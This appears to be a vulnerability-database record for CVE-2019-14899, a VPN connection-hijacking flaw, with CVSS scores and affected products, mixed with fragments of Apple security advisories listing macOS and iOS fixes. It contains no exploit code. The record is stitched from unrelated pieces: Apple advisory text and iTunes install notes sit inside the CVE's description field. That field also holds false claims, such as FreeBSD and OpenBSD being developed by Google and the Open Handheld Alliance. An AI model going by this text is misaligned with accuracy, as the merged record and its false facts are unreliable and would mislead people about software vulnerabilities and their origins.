Quick Look Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted document may lead to a cross site scripting attack Description: An access issue was addressed with improved access restrictions. CVE-2020-10012: Heige of KnownSec 404 Team (https://www.knownsec.com/) and Bo Qu of Palo Alto Networks (https://www.paloaltonetworks.com/)

Ruby Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to modify the file system Description: A path handling issue was addressed with improved validation. CVE-2020-27896: an anonymous researcher

Ruby Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: When parsing certain JSON documents, the json gem can be coerced into creating arbitrary objects in the target system Description: This issue was addressed with improved checks. CVE-2020-10663: Jeremy Evans

Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Visiting a malicious website may lead to address bar spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2020-9945: Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati

Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine a user's open tabs in Safari Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. CVE-2020-9977: Josh Parnham (@joshparnham)

Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2020-9942: an anonymous researcher, Rahul d Kankrale (servicenger.com), Rayyan Bijoora (@Bijoora) of The City School, PAF Chapter, Ruilin Yang of Tencent Security Xuanwu Lab, YoKo Kho (@YoKoAcc) of PT Telekomunikasi Indonesia (Persero) Tbk, Zhiyang Zeng(@Wester) of OPPO ZIWU Security Lab

Sandbox Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to view senstive user information Description: An access issue was addressed with additional sandbox restrictions. CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)

SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2020-9991

SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to leak memory Description: An information disclosure issue was addressed with improved state management. CVE-2020-9849

SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Multiple issues in SQLite Description: Multiple issues were addressed by updating SQLite to version 3.32.3. CVE-2020-15358

SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A maliciously crafted SQL query may lead to data corruption Description: This issue was addressed with improved checks. CVE-2020-13631

SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2020-13434 CVE-2020-13435 CVE-2020-9991

SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2020-13630

Symptom Framework Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-27899: 08Tc3wBB working with ZecOps Entry added December 14, 2020

System Preferences Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A logic issue was addressed with improved state management. CVE-2020-10009: Thijs Alkemade of Computest Research Division

TCC Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application with root privileges may be able to access private information Description: A logic issue was addressed with improved restrictions. CVE-2020-10008: Wojciech Reguła of SecuRing (wojciechregula.blog) Entry added December 14, 2020

WebKit Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2020-27918: Liu Long of Ant Security Light-Year Lab Entry updated December 14, 2020

Wi-Fi Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker may be able to bypass Managed Frame Protection Description: A denial of service issue was addressed with improved state handling. CVE-2020-27898: Stephan Marais of University of Johannesburg

Xsan Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to access restricted files Description: This issue was addressed with improved entitlements. CVE-2020-10006: Wojciech Reguła (@_r3ggi) of SecuRing

Additional recognition

802.1X We would like to acknowledge Kenana Dalle of Hamad bin Khalifa University and Ryan Riley of Carnegie Mellon University in Qatar for their assistance. Entry added December 14, 2020

Audio We would like to acknowledge JunDong Xie and XingWei Lin of Ant- financial Light-Year Security Lab, an anonymous researcher for their assistance.

Bluetooth We would like to acknowledge Andy Davis of NCC Group, Dennis Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for their assistance. Entry updated December 14, 2020

Clang We would like to acknowledge Brandon Azad of Google Project Zero for their assistance.

Core Location We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance.

Crash Reporter We would like to acknowledge Artur Byszko of AFINE for their assistance. Entry added December 14, 2020

Directory Utility We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing for their assistance.

iAP We would like to acknowledge Andy Davis of NCC Group for their assistance.

Kernel We would like to acknowledge Brandon Azad of Google Project Zero, Stephen Röttger of Google for their assistance.

libxml2 We would like to acknowledge an anonymous researcher for their assistance. Entry added December 14, 2020

Login Window We would like to acknowledge Rob Morton of Leidos for their assistance.

Photos Storage We would like to acknowledge Paulos Yibelo of LimeHats for their assistance.

Quick Look We would like to acknowledge Csaba Fitzl (@theevilbit) and Wojciech Reguła of SecuRing (wojciechregula.blog) for their assistance.

Safari We would like to acknowledge Gabriel Corona and Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati for their assistance.

Security We would like to acknowledge Christian Starkjohann of Objective Development Software GmbH for their assistance.

System Preferences We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl/YDPwACgkQZcsbuWJ6 jjANmhAAoj+ZHNnH2pGDFl2/jrAtvWBtXg8mqw6NtNbGqWDZFhnY5q7Lp8WTx/Pi x64A4F8bU5xcybnmaDpK5PMwAAIiAg4g1BhpOq3pGyeHEasNx7D9damfqFGKiivS p8nl62XE74ayfxdZGa+2tOVFTFwqixfr0aALVoQUhAWNeYuvVSgJXlgdGjj+QSL+ 9vW86kbQypOqT5TPDg6tpJy3g5s4hotkfzCfxA9mIKOg5e/nnoRNhw0c1dzfeTRO INzGxnajKGGYy2C3MH6t0cKG0B6cH7aePZCHYJ1jmuAVd0SD3PfmoT76DeRGC4Ri c8fGD+5pvSF6/+5E+MbH3t3D6bLiCGRFJtYNMpr46gUKKt27EonSiheYCP9xR6lU ChpYdcgHMOHX4a07/Oo8vEwQrtJ4JryhI9tfBel1ewdSoxk2iCFKzLLYkDMihD6B 1x/9MlaqEpLYBnuKkrRzFINW23TzFPTI/+i2SbUscRQtK0qE7Up5C+IUkRvBGhEs MuEmEnn5spnVG2EBcKeLtJxtf/h5WaRFrev72EvSVR+Ko8Cj0MgK6IATu6saq8bV kURL5empvpexFAvVQWRDaLgGBHKM+uArBz2OP6t7wFvD2p1Vq5M+dMrEPna1JO/S AXZYC9Y9bBRZfYQAv7nxa+uIXy2rGTuQKQY8ldu4eEHtJ0OhaB8= =T5Y8 -----END PGP SIGNATURE-----

. CVE-2020-9933: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201912-0930",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "ipados",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "13.6"
      },
      {
        "model": "iphone os",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "13.6"
      },
      {
        "model": "tvos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "13.4.8"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": null
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.6"
      },
      {
        "model": "freebsd",
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "openbsd",
        "scope": null,
        "trust": 0.8,
        "vendor": "openbsd",
        "version": null
      },
      {
        "model": "mac os x",
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "model": "ios",
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "10.15.6",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.4.8",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.6",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.6",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:macos:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apple",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "160061"
      },
      {
        "db": "PACKETSTORM",
        "id": "158457"
      },
      {
        "db": "PACKETSTORM",
        "id": "160545"
      },
      {
        "db": "PACKETSTORM",
        "id": "158456"
      },
      {
        "db": "PACKETSTORM",
        "id": "158458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ],
    "trust": 1.1
  },
  "cve": "CVE-2019-14899",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.9,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.4,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:A/AC:M/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Adjacent Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.9,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-14899",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:M/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.9,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.4,
            "id": "VHN-146891",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:A/AC:M/AU:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.5,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "author": "secalert@redhat.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.5,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Adjacent Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.4,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-14899",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-14899",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "secalert@redhat.com",
            "id": "CVE-2019-14899",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201912-441",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-146891",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-14899",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146891"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-14899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-013321"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14899"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-441"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A vulnerability was discovered in Linux, FreeBSD, OpenBSD, MacOS, iOS, and Android that allows a malicious access point, or an adjacent user, to determine if a connected user is using a VPN, make positive inferences about the websites they are visiting, and determine the correct sequence and acknowledgement numbers in use, allowing the bad actor to inject data into the TCP stream. This provides everything that is needed for an attacker to hijack active connections inside the VPN tunnel. Unspecified vulnerabilities exist in multiple products.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Android is a Linux-based open source operating system developed by Google and the Open Handheld Alliance (OHA). FreeBSD is a Unix-like operating system developed by the Google Foundation and the Open Handheld Alliance (OHA) Foundation. pts is a pseudo-terminal driver used in it. OpenBSD is a cross-platform, BSD-based UNIX-like operating system developed by the Google (Google) project team and the Open Handheld Alliance (OHA) project team. There are security holes in OpenVPN. \nCVE-2020-9976: Rias A. Murdoch (@SJMurdoch) of OneSpan\u0027s Innovation Centre\n(onespan.com) and University College London, Jack Cable of Lightning\nSecurity, Ryan Pickren (ryanpickren.com), Yair Amit for their\nassistance. \nEntry added November 12, 2020\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom https://www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update\nwill be \"iOS 14.0 and iPadOS 14.0\". -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2020-12-14-4 Additional information for\nAPPLE-SA-2020-11-13-1 macOS Big Sur 11.0.1\n\nmacOS Big Sur 11.0.1 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT211931. \n\nAMD\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to execute arbitrary code\nwith system privileges\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nCVE-2020-27914: Yu Wang of Didi Research America\nCVE-2020-27915: Yu Wang of Didi Research America\nEntry added December 14, 2020\n\nApp Store\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to gain elevated privileges\nDescription: This issue was addressed by removing the vulnerable\ncode. \nCVE-2020-27903: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\nAudio\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted audio file may lead to\narbitrary code execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2020-27910: JunDong Xie and XingWei Lin of Ant Security Light-\nYear Lab\n\nAudio\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted audio file may lead to\narbitrary code execution\nDescription: An out-of-bounds write was addressed with improved input\nvalidation. \nCVE-2020-27916: JunDong Xie of Ant Security Light-Year Lab\n\nAudio\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to read restricted memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab\n\nAudio\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to read restricted memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab\n\nBluetooth\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to cause unexpected application\ntermination or heap corruption\nDescription: Multiple integer overflows were addressed with improved\ninput validation. \nCVE-2020-27906: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong\nSecurity Lab\n\nCoreAudio\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted audio file may lead to\narbitrary code execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2020-27908: JunDong Xie and XingWei Lin of Ant Security Light-\nYear Lab\nCVE-2020-27909: Anonymous working with Trend Micro Zero Day\nInitiative, JunDong Xie and XingWei Lin of Ant Security Light-Year\nLab\nCVE-2020-9960: JunDong Xie and XingWei Lin of Ant Security Light-Year\nLab\nEntry added December 14, 2020\n\nCoreAudio\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted audio file may lead to\narbitrary code execution\nDescription: An out-of-bounds write was addressed with improved input\nvalidation. \nCVE-2020-10017: Francis working with Trend Micro Zero Day Initiative,\nJunDong Xie of Ant Security Light-Year Lab\n\nCoreCapture\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-9949: Proteas\n\nCoreGraphics\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write was addressed with improved input\nvalidation. \nCVE-2020-9883: an anonymous researcher, Mickey Jin of Trend Micro\n\nCrash Reporter\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A local attacker may be able to elevate  their privileges\nDescription: An issue existed within the path validation logic for\nsymlinks. This issue was addressed with improved path sanitization. \nCVE-2020-10003: Tim Michaud (@TimGMichaud) of Leviathan\n\nCoreText\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2020-27922: Mickey Jin of Trend Micro\nEntry added December 14, 2020\n\nCoreText\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted text file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2020-9999: Apple\nEntry updated December 14, 2020\n\nDisk 